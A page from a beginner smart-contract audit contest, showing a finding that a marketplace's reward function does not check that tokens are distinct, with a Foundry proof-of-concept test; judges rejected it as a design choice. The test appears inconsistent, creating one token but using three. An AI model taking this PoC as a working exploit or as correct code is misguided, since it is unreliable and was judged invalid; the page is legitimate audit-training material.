First Flight #13: Baba Marta

First Flight #13

Beginner FriendlyFoundryGameFi

100 EXP

View results

Previous Next

Submission Details

Severity: medium

Invalid

`MartenitsaMarketplace::collectReward` is not checking that the `martenitsaToken` are different or not.

badal_sharma09

Description: This contract provides a marketplace where users can buy and sell martenitsa tokens, with additional functionality for making presents, collecting rewards and managing listings. All users can participate in buying and collecting rewards, but only producers can list their tokens for sale and then sell them. MartenitsaMarketplace::collectReward allows users to collect HealthTokens as a reward based on the number of MartenitsaTokens they own. For every 3 different MartenitsaTokens, you receive 1 HealthToken. However, MartenitsaMarketplace::collectReward doesn't check that the martenitsaToken is different or not.

Impact: Malicious users can easily collect the HealthTokens without having three different tokens.

Proof Of Concept: Paste this test to your test folder and run the test.

function test_collectReward() public{

vm.startPrank(chasy);

// Create the same Martenstsa tokens

martenitsaToken.createMartenitsa("bracelet");

marketplace.listMartenitsaForSale(0, 1 wei);

marketplace.listMartenitsaForSale(1, 1 wei);

marketplace.listMartenitsaForSale(2, 1 wei);

martenitsaToken.approve(address(marketplace), 0);

martenitsaToken.approve(address(marketplace), 1);

martenitsaToken.approve(address(marketplace), 2);

// chasy present the Martenstsa tokens to Bob

marketplace.makePresent(bob, 0);

marketplace.makePresent(bob, 1);

marketplace.makePresent(bob, 2);

vm.stopPrank();

// bob collects the reward

// This function does not the check the Martenstsa tokens are same ot not

// Accoding to the documentation for every 3 different MartenitsaTokens you receive 1 HealthToken.

// but we have only bracelet named 3 MartenitsaTokens

// but we don't have 3 different MartenitsaTokens

vm.startPrank(bob);

marketplace.collectReward();

vm.stopPrank();

assert(healthToken.balanceOf(bob) == 10 ** 18);

console.log("balance of healToken:", healthToken.balanceOf(bob));

console.log("balance of martenitsaToken:", martenitsaToken.balanceOf(bob));

}

Updates

Lead Judging Commences

bube Lead Judge

over 1 year ago

bube Lead Judge over 1 year ago

Submission Judgement Published

Invalidated

Reason: Design choice

Rewards breakdown

nSLOC

239

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.